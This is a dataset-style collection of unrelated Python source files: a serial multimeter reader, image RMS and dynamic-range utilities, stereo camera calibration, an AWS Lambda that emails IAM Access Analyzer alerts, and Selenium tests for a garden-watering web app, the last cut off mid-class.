text stringlengths 957 885k |
|---|
#!/usr/bin/python
import serial, time
# Measurement mode names, indexed by the mode byte (data[0]) of a meter frame.
modes=['DC V','AC V','DC uA','DC mA','DC A',
       'AC uA','AC mA','AC A','OHM','CAP',
       'Hz','Net Hz','Amp Hz','Duty','Net Duty',
       'Amp Duty','Width','Net Width','Amp Width','Diode',
       'Continuity','hFE','Logic','dBm','EF','Temperature']
# Seven-segment bit patterns (with the decimal-point bit masked off) -> glyph.
segs={ 0x00: ' ',
       0x20: '-',
       0xd7: '0',
       0x50: '1',
       0xb5: '2',
       0xf1: '3',
       0x72: '4',
       0xe3: '5',
       0xe7: '6',
       0x51: '7',
       0xf7: '8',
       0xf3: '9',
       0x87: 'C',
       0xa7: 'E',
       0x27: 'F',
       0x86: 'L',
       0x66: 'h',
       0x64: 'n',
       0x37: 'P',
       0x24: 'r',
       0xa6: 't'}
# Attribute names for the bitmap bytes 1, 2 and 7 of a frame.
# Bit 7 maps to list index 0 (see Packet.load_data's 7-bit indexing).
byte1=['Hz','Ohms','K','M','F','A','V','m']
byte2=['u','n','dBm','S','%','hFE','REL','MIN']
byte7=['Beep','Diode','Bat','Hold','-','~','RS232','Auto']
# Bit that flags the decimal point inside each digit byte.
decimal=0x08
# Raised when a 9-byte frame's trailing checksum byte does not match.
class ChecksumError(Exception): pass
# Raised when a frame that is not exactly 9 bytes long is supplied.
class LengthError(Exception): pass
class Packet:
    """One decoded 9-byte frame from the meter.

    ``load_data`` parses a raw frame into ``mode`` (measurement mode name),
    ``unit`` (multiplier + unit string), ``value`` (float, or None when the
    display shows non-numeric text) and ``string`` (the display text).
    """
    def __init__(self):
        self.string=''
        self.unit=''
        self.value=None
        self.mode=None
    def load_data(self,data):
        """Parse a raw 9-byte frame into mode/unit/value/string.

        Raises LengthError when *data* is not exactly 9 bytes and
        ChecksumError when the trailing checksum byte does not match.
        """
        self.data=[ord(x) for x in data]
        if len(data) != 9:
            raise LengthError
        # Checksum is the low byte of (57 + sum of the first 8 bytes).
        checksum=0xff&(57+sum(self.data[:8]))
        if checksum != self.data[8]:
            raise ChecksumError
        self.mode=modes[self.data[0]]
        # Bytes 1, 2 and 7 are attribute bitmaps; bit 7 maps to list index 0.
        atts=[]
        for bit in range(8):
            if self.data[1] & (1<<bit): atts.append(byte1[7-bit])
            if self.data[2] & (1<<bit): atts.append(byte2[7-bit])
            if self.data[7] & (1<<bit): atts.append(byte7[7-bit])
        mult = [x for x in ['M','K','m','u','n'] if x in atts]
        if len(mult) > 1:
            # A valid frame never asserts more than one multiplier.
            # (The original used a bare ``raise`` with no active exception,
            # which itself raises RuntimeError instead of a useful error.)
            raise ValueError("multiple multipliers in frame: %r" % mult)
        mult=(mult+[' '])[0]
        unit = [x for x in ['Hz','Ohms','F','A','V',
                            'dBm','S','%','hFE',
                            'Beep','Diode'] if x in atts]
        if len(unit) > 1:
            raise ValueError("multiple units in frame: %r" % unit)
        unit=(unit+[''])[0]
        self.unit=mult+unit
        self.atts=atts
        # Digit bytes arrive least-significant first; 0x08 flags the
        # decimal point to the left of that digit.
        string=''
        for d in self.data[3:7]:
            string=segs[d & ~decimal]+string
            if (d & decimal):
                string="."+string
        try:
            self.value=float(string) * {'M':1e6,
                                        'K':1e3,
                                        ' ':1,
                                        'm':1e-3,
                                        'u':1e-6,
                                        'n':1e-9,
                                        'p':1e-12}[mult]
        except ValueError:
            # Non-numeric display text (e.g. overload indication).
            self.value=None
        if '-' in atts:
            string='-'+string
            # Guard against negating None when the display was non-numeric
            # (the original crashed with TypeError in that case).
            if self.value is not None:
                self.value=-self.value
        self.string=string
    def __repr__(self):
        return "%s %s"%(self.string,self.unit)
    def __nonzero__(self):
        # True once a frame has been decoded (Python 2 truth protocol).
        return None!=self.mode
    # Python 3 truth protocol alias, keeping py2 behavior intact.
    __bool__ = __nonzero__
class RSMeter:
    """Reads framed readings (9-byte frames, 4800 baud) from a serial
    multimeter and turns them into Packet objects."""
    def __init__(self, port='/dev/ttyPROLIFIC'):
        self.s=serial.Serial(port=port, timeout=0.1, baudrate=4800)
        # DTR asserted / RTS cleared — presumably powers the meter's serial
        # adapter from the control lines; confirm against the adapter docs.
        self.s.setDTR()
        self.s.setRTS(0)
        self.packet=None
    def flush(self):
        # Drop buffered bytes so the next read starts on fresh data.
        self.s.flushInput()
    def try_for_packet(self):
        """ May return a None packet"""
        d=self.s.read(9)
        if len(d)<9: return False
        #if len(d): print "read %d bytes"%len(d)
        p=Packet()
        # Resynchronise on the stream: try the last 9 bytes, and on a bad
        # checksum slide the window forward one byte at a time, giving up
        # after 9 extra bytes (len(d) > 18).
        while 1:
            if len(d)>18: return False
            try:
                p.load_data(d[-9:])
                return p
            except ChecksumError:
                d=d+self.s.read(1)
            except LengthError:
                return False
            else:
                return False
    def get_packet(self):
        """Block until a frame with a valid checksum has been read."""
        while 1:
            p=self.try_for_packet()
            if p: return p
    def stop_meter_loop(self): pass # for threaded compat
import threading
class RSMeterThreaded(RSMeter):
    """RSMeter variant that polls the serial port on a background thread.

    ``get_packet`` returns the most recent reading immediately instead of
    blocking on the serial port.
    """
    def __init__(self,port='/dev/ttyS0'):
        RSMeter.__init__(self,port)
        self.reading_lock=threading.Lock()
        # Initialise the shared slot *before* starting the reader thread.
        # The original assigned ``self.packet=None`` after the thread was
        # already running, so a freshly read packet could be clobbered.
        self.packet=None
        self.start_meter_loop()
    def run_meter_loop(self):
        """Reader-thread body: keep the freshest packet (or False after
        five consecutive failed attempts) in ``self.packet``."""
        while self.meter_loop_running:
            for i in range(5):
                p=self.try_for_packet()
                if p: break
            with self.reading_lock:
                self.packet=p
    def stop_meter_loop(self):
        """Signal the reader thread to exit and wait for it to finish."""
        self.meter_loop_running=False
        self.meter_loop.join()
    def start_meter_loop(self):
        """Start the background reader thread."""
        self.meter_loop_running=True
        self.meter_loop=threading.Thread(target=self.run_meter_loop)
        self.meter_loop.start()
    def get_packet(self):
        """Return the most recent reading without blocking."""
        with self.reading_lock:
            return self.packet
import time,sys
if __name__=="__main__":
    # The serial port may be given as the first command-line argument;
    # otherwise RSMeter's default port is used.
    try:
        meter=RSMeter(sys.argv[1])
    except IndexError:
        meter=RSMeter()
    try:
        # Print one numeric reading per second until Ctrl-C.
        # (Python 2 print-statement syntax, matching the rest of the file.)
        while 1:
            p=meter.get_packet()
            if p and None != p.value:
                print p.value
            time.sleep(1)
    except KeyboardInterrupt:
        print "interrupt!"
        meter.stop_meter_loop()
|
import numpy as np
def get_boxsize(num_corners, num_pixel=63):
    """Return the edge length (pixels) of a corner box.

    The fraction of the image edge used per box shrinks as more corner
    boxes are averaged: 30% for 2 corners, 22% for 3, 16% for 4.
    """
    edge_fractions = (0.3, 0.22, 0.16)
    return int(num_pixel * edge_fractions[num_corners - 2])
def select_box(rms, sensitivity=1e-6):
    """Zero out noisy corner boxes and count the surviving ones per image.

    Mutates *rms* in place: entries above *sensitivity* are set to 0.
    Returns, for each column (image), how many rows (corner boxes) are
    still non-zero.
    """
    for corner_rms in rms:
        corner_rms[corner_rms > sensitivity] = 0
    return rms.astype(bool).sum(axis=0)
def compute_rms(batch, size):
    """RMS of each of the four size x size corner patches of every image.

    Parameters
    ----------
    batch : array of shape (n_images, H, W)
    size : int
        Edge length of the square corner patch.

    Returns
    -------
    array of shape (4, n_images); rows are the top-left, top-right,
    bottom-left and bottom-right corner RMS values.
    """
    def _patch_rms(patches):
        # Root mean square over each flattened size*size patch.
        return np.sqrt((patches.reshape(-1, size ** 2) ** 2).mean(axis=1))

    # The original pre-initialised rms1..rms4 to -1 and immediately
    # overwrote them; that dead initialisation is dropped.
    return np.stack([
        _patch_rms(batch[:, :size, :size]),
        _patch_rms(batch[:, :size, -size:]),
        _patch_rms(batch[:, -size:, :size]),
        _patch_rms(batch[:, -size:, -size:]),
    ], axis=0)
def get_rms(ifft_truth, ifft_pred):
    """Per-image averaged corner RMS for truth and predicted images.

    For each image, corner boxes whose truth RMS exceeds 1e-6 are dropped
    (select_box zeroes them IN PLACE), and the remaining 4, 3 or 2 boxes
    are averaged. Returns (rms_truth, rms_pred, rms_boxes, corners) where
    rms_boxes counts the surviving 4-corner boxes per image and corners is
    an (n_images, 4) mask of which 4-corner boxes survived.
    """
    rms_4_truth = compute_rms(ifft_truth, get_boxsize(4))
    # rms_boxes (per-image surviving box count) is taken from the 4-box pass.
    rms_boxes = select_box(rms_4_truth, 1e-6)
    rms_3_truth = compute_rms(ifft_truth, get_boxsize(3))
    # Return value discarded on purpose: only the in-place zeroing matters.
    select_box(rms_3_truth)
    rms_2_truth = compute_rms(ifft_truth, get_boxsize(2))
    select_box(rms_2_truth)
    rms_4_pred = compute_rms(ifft_pred, get_boxsize(4))
    rms_3_pred = compute_rms(ifft_pred, get_boxsize(3))
    rms_2_pred = compute_rms(ifft_pred, get_boxsize(2))
    # Mask the prediction boxes wherever the truth box was rejected, so
    # truth and prediction always average over the same corners.
    rms_3_pred[rms_3_truth == 0] = 0
    rms_2_pred[rms_2_truth == 0] = 0
    # Average the surviving boxes; each image uses the pass matching its
    # surviving-box count. NOTE(review): np.sqrt(x ** 2) is elementwise
    # abs, so this is a mean of |RMS| values rather than a quadrature
    # combination — presumably intentional, but worth confirming.
    rms_truth = np.zeros(len(rms_boxes))
    rms_truth[rms_boxes == 4] = (
        np.sqrt(rms_4_truth[0:4, rms_boxes == 4] ** 2).sum(axis=0) / 4
    )
    rms_truth[rms_boxes == 3] = (
        np.sqrt(rms_3_truth[0:4, rms_boxes == 3] ** 2).sum(axis=0) / 3
    )
    rms_truth[rms_boxes == 2] = (
        np.sqrt(rms_2_truth[0:4, rms_boxes == 2] ** 2).sum(axis=0) / 2
    )
    rms_pred = np.zeros(len(rms_boxes))
    rms_pred[rms_boxes == 4] = (
        np.sqrt(rms_4_pred[0:4, rms_boxes == 4] ** 2).sum(axis=0) / 4
    )
    rms_pred[rms_boxes == 3] = (
        np.sqrt(rms_3_pred[0:4, rms_boxes == 3] ** 2).sum(axis=0) / 3
    )
    rms_pred[rms_boxes == 2] = (
        np.sqrt(rms_2_pred[0:4, rms_boxes == 2] ** 2).sum(axis=0) / 2
    )
    # (n_images, 4) mask: 0 where the 4-corner truth box was rejected.
    corners = np.ones((rms_4_truth.shape[-1], 4))
    corners[rms_4_truth.swapaxes(1, 0) == 0] = 0
    return rms_truth, rms_pred, rms_boxes, corners
def calc_dr(ifft_truth, ifft_pred):
    """Dynamic range (image peak / averaged corner RMS) for truth and
    predicted images; also passes through the box count and corner mask
    from get_rms."""
    rms_truth, rms_pred, rms_boxes, corners = get_rms(ifft_truth, ifft_pred)
    n_pix_truth = ifft_truth.shape[-1] ** 2
    n_pix_pred = ifft_pred.shape[-1] ** 2
    peaks_truth = ifft_truth.reshape(-1, n_pix_truth).max(axis=1)
    peaks_pred = ifft_pred.reshape(-1, n_pix_pred).max(axis=1)
    return peaks_truth / rms_truth, peaks_pred / rms_pred, rms_boxes, corners
|
#!/usr/bin/env python
# coding: utf-8
import cv2
import numpy as np
import matplotlib.pyplot as plt
import glob
import re
def cameraCalibrate(img_names, board_shape, visualize=False, visualize_shape=(4, 4)):
    """Calibrate a single camera from chessboard images.

    Parameters
    ----------
    img_names : list of image file paths.
    board_shape : (board_w, board_h) inner-corner counts of the chessboard.
    visualize : plot corner detections and undistorted images when True
        (the original ignored this flag and always plotted).
    visualize_shape : subplot grid (rows, cols) for the plots.

    Returns
    -------
    (reprojection_error, camera_matrix, dist_coeffs, image_points,
     object_points, width, height)
    """
    # generate object points and calibrate camera
    bw, bh = board_shape
    x = np.arange(bw)
    y = np.arange(bh)
    yy, xx = np.meshgrid(y, x)
    # Planar board: object points are the (x, y, 0) grid corners.
    obj_points = np.stack([xx, yy, np.zeros_like(xx)], axis=2)
    obj_points = obj_points.reshape(-1, 1, 3).astype(np.float32)
    # ndarray shape is (rows, cols, channels) = (height, width, channels).
    # The original unpacked it as (w, h, _), swapping width and height,
    # which corrupts imageSize for non-square images.
    h, w, _ = cv2.imread(img_names[0]).shape
    # get all image corner pts
    img_pts = list()
    obj_pts = list()
    max_plots = visualize_shape[0] * visualize_shape[1]
    if visualize:
        plt.title('single camera corner detection')
    for i, img_name in enumerate(img_names):
        img_data = cv2.imread(img_name)
        flag, corner_pts = cv2.findChessboardCorners(img_data, (bh, bw))
        if visualize and i + 1 <= max_plots:
            plt.subplot(visualize_shape[0], visualize_shape[1], i + 1)
            plt.imshow(img_data)
        if not flag:
            continue
        if visualize and i + 1 <= max_plots:
            # One scatter per board row. The original hard-coded range(9)
            # and a row length of 5 (and reused the outer loop index i);
            # derive both from board_shape instead.
            for row in range(bw):
                plt.scatter(corner_pts[row * bh: (row + 1) * bh, 0, 0],
                            corner_pts[row * bh: (row + 1) * bh, 0, 1],
                            marker='^', linewidths=0.1)
        img_pts.append(corner_pts)
        obj_pts.append(obj_points)
    if visualize:
        plt.show()
    ret_val, matrix, dist_coff, rvec, tvec = cv2.calibrateCamera(
        np.array(obj_pts), np.array(img_pts), (w, h), None, None)
    if visualize:
        plt.title('single camera calibration')
        # plot undistorted images with detected points
        for i, img_name in enumerate(img_names):
            if i + 1 > max_plots:
                break
            img_data = cv2.imread(img_name)
            new_matrix, roi = cv2.getOptimalNewCameraMatrix(matrix, dist_coff, (w, h), 0, (w, h))
            undistorted_image = cv2.undistort(img_data, matrix, dist_coff, new_matrix)
            plt.subplot(visualize_shape[0], visualize_shape[1], i + 1)
            plt.imshow(undistorted_image)
        plt.show()
    return ret_val, matrix, dist_coff, img_pts, obj_pts, w, h
def binocularCameraCalibrate(left_imgs, right_imgs, board_shape, visualize=False, visualize_shape=(4,4)):
    """Stereo-calibrate a left/right camera pair from chessboard images.

    Returns (left_matrix, left_dist, right_matrix, right_dist, R, T) where
    R/T transform points from the left to the right camera frame.
    """
    # check number consistency: the numeric parts of each filename pair
    # must match. The original pattern r'd+' matched the literal letter
    # 'd'; \d+ matches the digit runs as intended.
    for left_name, right_name in zip(left_imgs, right_imgs):
        assert re.findall(r'\d+', left_name) == re.findall(r'\d+', right_name), \
            f"{left_name}, {right_name} not consistent!"
    # calibrate single camera
    errleft, ml, dl, img_ptsl, obj_pts, w, h = cameraCalibrate(left_imgs, board_shape, visualize, visualize_shape)
    errright, mr, dr, img_ptsr, _, _, _ = cameraCalibrate(right_imgs, board_shape, visualize, visualize_shape)
    # calibrate binocular camera with the per-camera intrinsics held fixed
    err, ml, dl, mr, dr, R, T, E, F = cv2.stereoCalibrate(obj_pts, img_ptsl, img_ptsr, ml, dl, mr, dr, (w, h), flags=cv2.CALIB_FIX_INTRINSIC)
    # stereo rectify and build the per-camera remap tables
    Rl, Rr, Pl, Pr, Q, Roil, Roir = cv2.stereoRectify(ml, dl, mr, dr, (w, h), R, T)
    lmapx, lmapy = cv2.initUndistortRectifyMap(ml, dl, Rl, Pl[:, :3], (w, h), cv2.CV_32FC1)
    rmapx, rmapy = cv2.initUndistortRectifyMap(mr, dr, Rr, Pr[:, :3], (w, h), cv2.CV_32FC1)
    if visualize:
        plt.figure(figsize=(10, 10), dpi=100)
        for i, img_pair in enumerate(zip(left_imgs, right_imgs)):
            left_img, right_img = cv2.imread(img_pair[0]), cv2.imread(img_pair[1])
            nleft = cv2.remap(left_img, lmapx, lmapy, cv2.INTER_LINEAR)
            nright = cv2.remap(right_img, rmapx, rmapy, cv2.INTER_LINEAR)
            # concat the rectified pair side by side
            full_img = cv2.hconcat([nleft, nright])
            # Use fresh names: the original clobbered w/h here.
            fh, fw, _ = full_img.shape
            plt.subplot(visualize_shape[0], visualize_shape[1], i + 1)
            plt.imshow(full_img)
            # Horizontal lines: after rectification, matching features
            # should lie on the same row in both halves.
            for yline in range(0, fh, 50):
                plt.plot([0, fw - 1], [yline, yline], linewidth=0.5)
        plt.show()
    return ml, dl, mr, dr, R, T
if __name__ == '__main__':
    # Calibrate from the first four left/right image pairs, using a board
    # with (7, 5) inner corners and a 2x2 visualization grid.
    left_imgs = sorted(glob.glob('imgs/left/*.jpg'))[:4]
    right_imgs = sorted(glob.glob('imgs/right/*.jpg'))[:4]
    cam_ml, dist_l, cam_mr, dist_r, R, T = binocularCameraCalibrate(left_imgs, right_imgs, (7, 5), True,(2, 2))
|
<gh_stars>1-10
import boto3
from botocore.exceptions import ClientError
import json
import os
import datetime
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import logging
# Root logger verbosity is driven by the DEBUG environment variable,
# defaulting to INFO. The original indexed os.environ['DEBUG'] directly
# and raised KeyError at import time when the variable was unset.
logger = logging.getLogger()
if os.environ.get('DEBUG') == "True":
    logger.setLevel(logging.DEBUG)
else:
    logger.setLevel(logging.INFO)
# Quieten the chatty AWS/HTTP client libraries.
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def handler(event, context):
    """Lambda entry point: convert an IAM Access Analyzer finding
    (delivered via SNS) into a plain-text + HTML email alert sent via SES.

    Returns the incoming *event* unchanged, including on the early-exit
    paths, so invocations can be chained/inspected.
    """
    logger.debug("Received event: " + json.dumps(event, sort_keys=True))
    message = json.loads(event['Records'][0]['Sns']['Message'])
    logger.info("Received message: " + json.dumps(message, sort_keys=True))
    # Structure of the Finding
    # {
    #     "version": "0",
    #     "id": "081668c3-90e7-a9ca-f284-9cb4b2396a4d",
    #     "detail-type": "Access Analyzer Finding",
    #     "source": "aws.access-analyzer",
    #     "account": "012345678901",
    #     "time": "2019-12-07T17:36:45Z",
    #     "region": "us-east-1",
    #     "resources": [
    #         "arn:aws:access-analyzer:us-east-1:012345678901:analyzer/aws-iam-access-alerter"
    #     ],
    #     "detail": {
    #         "version": "1.0",
    #         "id": "b1087d63-331c-4433-84f2-a973c7ae1313",
    #         "status": "ACTIVE",
    #         "resourceType": "AWS::IAM::Role",
    #         "resource": "arn:aws:iam::012345678901:role/fnord",
    #         "createdAt": "2019-12-07T17:36:42Z",
    #         "analyzedAt": "2019-12-07T17:36:42Z",
    #         "updatedAt": "2019-12-07T17:36:42Z",
    #         "accountId": "012345678901",
    #         "region": "us-east-1",
    #         "principal": {
    #             "AWS": "987654321098"
    #         },
    #         "action": [
    #             "sts:AssumeRole"
    #         ],
    #         "condition": {},
    #         "isDeleted": false,
    #         "isPublic": false
    #     }
    # }
    finding = message['detail']
    # Only alert on ACTIVE findings; resolved/archived ones are ignored.
    if finding['status'] != "ACTIVE":
        logger.debug(f"Finding is of status: {finding['status']}")
        return(event)
    # Skip resources the analyzer itself was unable to inspect.
    if 'error' in finding and finding['error'] == "ACCESS_DENIED":
        logger.debug(f"Unable to access resource {finding['resource']}")
        return(event)
    try:
        # Prefer the account alias (when one is set) for readable subjects.
        iam_client = boto3.client('iam')
        response = iam_client.list_account_aliases()
        if 'AccountAliases' in response and len(response['AccountAliases']) > 0:
            account_alias = response['AccountAliases'][0]
            account_desc = f"{account_alias}({finding['accountId']})"
        else:
            account_alias = None
            account_desc = f"{finding['accountId']}"
        # Make some notes based on attributes of the finding
        if finding['isPublic']:
            subject = f"New Public Resource found in {account_desc}"
            intro = f"A New Public Resource has been discovered in your account {account_desc}:"
            explanation = "This resource can be accessed by anyone on the Internet"
        elif finding['resourceType'] == "AWS::IAM::Role" and 'Federated' in finding['principal']:
            subject = f"New SAML Federation found in {account_desc}"
            intro = f"A New SAML Federation has been discovered in {account_desc}: "
            explanation = "Make sure the identity provider noted above as the Trusted Entity belongs to your organization and has appropriate security controls in place."
        elif finding['resourceType'] == "AWS::IAM::Role":
            subject = f"New cross-account role found in {account_desc}"
            intro = f"A New cross-account role has been discovered in {account_desc}: "
            explanation = "The trusted entity above has permissions to perform actions in your account. You should validate that account's identity and perform a risk-assessment on it. \n Note: The actions that can be performed are not reported by the IAM Access Analyzer and should be inspected for least privilege."
        elif 'AWS' in finding['principal'] and finding['principal']['AWS'] == "*":
            subject = f"New un-authenticated resource found in {account_desc}"
            intro = f"A New resource has been discovered in {account_desc} that does not require IAM Authentication: "
            explanation = "The above resource does not require AWS IAM Authentication to access. All security measures rely on the conditions noted above"
        else:
            subject = f"New Resource trust found in {account_desc}"
            intro = f"A New Trust has been discovered in your account {account_desc}: "
            explanation = "The above resource is accessible to the Trusted Entity for the actions noted above"
        # Show account number of * if that's the trust, otherwise the entire principal in json.
        if 'AWS' in finding['principal']:
            trusted_entity = finding['principal']['AWS']
        else:
            trusted_entity = finding['principal']
        # Create a message body
        txt_body = f"""{intro}
Resource: {finding['resource']}
Type: {finding['resourceType']}
Region: {finding['region']}
Trusted Entity: {trusted_entity}
Actions: {json.dumps(finding['action'], sort_keys=True)}
Conditions: {finding['condition']}
{explanation}
"""
        html_body = f"""{intro}<p>
<b>Resource:</b> {finding['resource']}<br>
<b>Type:</b> {finding['resourceType']}<br>
<b>Region:</b> {finding['region']}<br>
<b>Trusted Entity:</b> {trusted_entity}<br>
<b>Actions:</b> {json.dumps(finding['action'], sort_keys=True)}<br>
<b>Conditions:</b> {finding['condition']}<br>
<p>
{explanation}
"""
        logger.info(f"Subject: {subject}\n Body: {txt_body}")
        send_email(subject, txt_body, html_body)
        return(event)
    except ClientError as e:
        logger.critical("AWS Error getting info: {}".format(e))
        raise
    except Exception as e:
        logger.critical("{}".format(e))
        raise
def send_email(subject, txt_body, html_body):
    """Send a multipart (plain-text + HTML) email through SES.

    Sender and recipient come from the EMAIL_FROM / EMAIL_TO environment
    variables.
    """
    # Always send emails via us-east-1 where SES is available and configured
    ses_client = boto3.client('ses', region_name='us-east-1')
    sender = os.environ['EMAIL_FROM']
    recipient = os.environ['EMAIL_TO']
    outer = MIMEMultipart()
    outer['From'] = sender
    outer['To'] = recipient
    outer['Subject'] = subject
    # The 'alternative' part lets the mail client pick plain text or HTML.
    alternatives = MIMEMultipart('alternative')
    alternatives.attach(MIMEText(txt_body, 'plain'))
    alternatives.attach(MIMEText(html_body, 'html'))
    outer.attach(alternatives)
    logger.info("Sending email to {}".format(outer['To']))
    response = ses_client.send_raw_email(
        Source=outer['From'],
        RawMessage={
            'Data': outer.as_string(),
        })
### END OF CODE ###
|
import pytest
from django.urls import reverse
from garden.formatters import WateringStationFormatter
from garden.utils import build_duration_string
from selenium.common.exceptions import InvalidElementStateException
from tests.assertions import assert_image_files_equal
from .base import Base, wait_for
from .pages.garden_detail_page import GardenDetailPage
from .pages.garden_list_page import GardenListPage
from .pages.garden_update_page import GardenUpdatePage
from .pages.watering_station_detail_page import WateringStationDetailPage
from .pages.watering_station_update_page import WateringStationUpdatePage
class TestGardenModification(Base):
    """Browser-level (selenium) tests for garden editing: the update form,
    API-key reset, watering-station editing, bulk (de)activation and the
    delete-confirmation modal flows."""

    @pytest.fixture(autouse=True)
    def setup(self, user_factory, garden_factory, test_password, live_server, use_tmp_static_dir):
        """Create an authenticated user owning a garden with 10 default
        watering stations, and point self.url at its detail page."""
        self.email = '<EMAIL>'
        # NOTE(review): '<PASSWORD>' is a redaction placeholder left by the
        # export — presumably the test_password fixture value belongs here.
        self.user = user_factory(email=self.email, password=<PASSWORD>)
        self.num_watering_stations = 10
        self.garden = garden_factory(owner=self.user,
                                     watering_stations=self.num_watering_stations,
                                     watering_stations__defaults=True)
        self.url = live_server.url + reverse('garden-detail', kwargs={'pk': self.garden.pk})
        self.create_authenticated_session(self.user, live_server)

    @pytest.mark.django_db
    def test_a_user_can_modify_their_garden(self):
        """Edit a garden's name/image/frequency, reset its API key, then
        delete the garden and land on an empty garden list."""
        self.driver.get(self.url)
        garden_page = GardenDetailPage(self.driver)
        self.wait_for_page_to_be_loaded(garden_page)
        # the user clicks the edit button and is taken to update garden page
        garden_page.edit_button.click()
        update_gpage = GardenUpdatePage(self.driver)
        self.wait_for_page_to_be_loaded(update_gpage)
        # the user sees a form that lets them change the name of the garden, upload a different picture for the garden,
        # and delete the garden. They enter invalid data and try to submit the form, but they see errors.
        update_gpage.update_garden(update_frequency=-1)
        self.wait_for_form_error('error_1_id_update_frequency')
        # they then enter valid information and submit the form
        new_garden_name = 'My new garden name'
        new_garden_image = 'test_garden_image.png'
        new_update_frequency = '10:00'
        update_gpage.update_garden(
            submit=False,
            name=new_garden_name,
            update_frequency=new_update_frequency,
            image=new_garden_image
        )
        self.perform_image_crop(update_gpage, new_garden_image)
        update_gpage.submit_button.click()
        # the user then tries to edit the api key field but fails. Instead they click the Reset button near it
        # and it changes
        orig_key = str(update_gpage.api_key)
        try:
            update_gpage.api_key = 'aioufhaiulfhaofjsoieg'
        except InvalidElementStateException:
            pass
        else:
            pytest.fail('User should not be able to manually update API Key')
        update_gpage.reset_api_key_button.click()
        assert wait_for(lambda: '*' not in str(update_gpage.api_key))
        assert update_gpage.api_key != orig_key
        # goes back to the garden detail page where they see the new name and image
        update_gpage.garden_detail_nav_button.click()
        self.wait_for_page_to_be_loaded(garden_page)
        assert garden_page.get_garden_name() == new_garden_name
        assert_image_files_equal(garden_page.get_garden_image_src(), new_garden_image)
        # the user the clicks edit again and is taken back to the update garden page, where they see their new data
        # prefilled in the form
        garden_page.edit_button.click()
        self.wait_for_page_to_be_loaded(update_gpage)
        update_gpage.assert_form_has_values(
            name=new_garden_name, update_frequency=new_update_frequency, image=new_garden_image)
        # the user then deletes the garden
        self.perform_delete_modal_checks(update_gpage)
        # they are then redirected back to the garden list page where they see no gardens
        list_gpage = GardenListPage(self.driver)
        self.wait_for_page_to_be_loaded(list_gpage)
        assert list_gpage.get_number_of_gardens() == 0

    @pytest.mark.django_db
    def test_user_can_modify_their_gardens_watering_stations(self):
        """Walk the station table, edit one station, toggle all stations
        off/on, then delete a station via the confirmation modal."""
        # a user goes to a garden detail page
        self.driver.get(self.url)
        garden_page = GardenDetailPage(self.driver)
        self.wait_for_page_to_be_loaded(garden_page)
        # the user sees information about the garden
        self.garden.refresh_from_db()
        assert garden_page.is_displaying_info_for_garden(self.garden)
        # they see a table, where each row corresponds to a watering station in the garden and the header of the table
        # displays the field names of the watering_stations
        self.assert_watering_station_table_contains_correct_headers(garden_page)
        # the user also notices that the row display some information about the watering station
        selected_watering_station = 1
        watering_station = self.garden.get_watering_station_at_idx(selected_watering_station - 1)
        assert garden_page.is_table_row_displaying_data_for_watering_station(
            selected_watering_station, watering_station)
        # they click a watering station link and are taken to the watering station detail page.
        garden_page.watering_station = selected_watering_station
        detail_ws_page = WateringStationDetailPage(self.driver)
        self.wait_for_page_to_be_loaded(detail_ws_page)
        # the user sees that the watering station has the same information as on the table in the previous page
        assert detail_ws_page.is_displaying_data_for_watering_station(watering_station)
        # they see an edit button on the page and click it.
        detail_ws_page.edit_button.click()
        # they are taken to a page with a form that allows them to edit the configurations of the watering station.
        # The user notices that the values in the form are from the same watering station
        update_ws_page = WateringStationUpdatePage(self.driver)
        self.wait_for_page_to_be_loaded(update_ws_page)
        assert update_ws_page.form_has_values_from_watering_station(watering_station)
        # the user tries to enter invalid info, but the form renders errors
        moisture_threshold = -1
        watering_duration = -1
        update_ws_page.update_info(
            moisture_threshold=moisture_threshold,
            watering_duration=watering_duration
        )
        self.wait_for_form_error('error_1_id_moisture_threshold')
        self.wait_for_form_error('error_1_id_watering_duration')
        # the user then changes these values and submits the form
        ws_status = not watering_station.status
        plant_type = 'lettuce'
        moisture_threshold = '80'
        watering_duration = build_duration_string(minutes=10, seconds=2)
        image = 'test_lettuce_image.png'
        update_ws_page.update_info(ws_status, plant_type, moisture_threshold,
                                   watering_duration, image, self.perform_image_crop)
        watering_station.refresh_from_db()
        # they then go back to the garden detail view and sees that the changes have been persisted in the table
        update_ws_page.garden_detail_nav_button.click()
        self.wait_for_page_to_be_loaded(garden_page)
        assert garden_page.is_table_row_displaying_data_for_watering_station(
            selected_watering_station, watering_station)
        # the user then selects a different watering station page
        garden_page.watering_station = selected_watering_station + 1
        self.wait_for_page_to_be_loaded(detail_ws_page)
        # they then use the navbar to go directly to the watering station that they had edited and see that their
        # configurations have persisted on both the detail and update pages
        update_ws_page.go_to_watering_station_page(selected_watering_station)
        detail_ws_page.is_displaying_data_for_watering_station(watering_station)
        detail_ws_page.edit_button.click()
        assert update_ws_page.form_has_values_from_watering_station(watering_station)
        # the user then goes back to the garden detail page
        update_ws_page.garden_detail_nav_button.click()
        self.wait_for_page_to_be_loaded(garden_page)
        # the user then clicks the deactivate all button and all watering stations in the table are deactivated
        garden_page.deactivate_button.click()
        for i in range(1, self.num_watering_stations):
            status = garden_page.get_watering_station_field_value(i, 'Status')
            assert not self.ws_status_to_bool(status)
        # the user then clicks the activate all button and all watering statios in the table are activated
        garden_page.activate_button.click()
        for i in range(1, self.num_watering_stations):
            status = garden_page.get_watering_station_field_value(i, 'Status')
            assert self.ws_status_to_bool(status)
        # the user then goes to watering_station page and deletes the watering station
        garden_page.watering_station = selected_watering_station + 1
        self.wait_for_page_to_be_loaded(detail_ws_page)
        detail_ws_page.edit_button.click()
        self.wait_for_page_to_be_loaded(update_ws_page)
        self.perform_delete_modal_checks(update_ws_page)
        # They are then redirected back to the garden detail page, where they see 1 less watering station
        self.wait_for_page_to_be_loaded(garden_page)
        assert garden_page.get_number_watering_stations() == self.num_watering_stations - 1

    def assert_watering_station_table_contains_correct_headers(self, garden_page):
        """Check the station table row count and expected column headers."""
        assert garden_page.get_number_watering_stations() == self.garden.watering_stations.count()
        assert garden_page.field_is_in_watering_station_table('#')
        assert garden_page.field_is_in_watering_station_table('Status')
        assert garden_page.field_is_in_watering_station_table('Plant Type')
        assert garden_page.field_is_in_watering_station_table('Moisture Threshold')
        assert garden_page.field_is_in_watering_station_table('Watering Duration')

    def perform_delete_modal_checks(self, page):
        """Exercise the delete-confirmation modal: cancel once, then delete."""
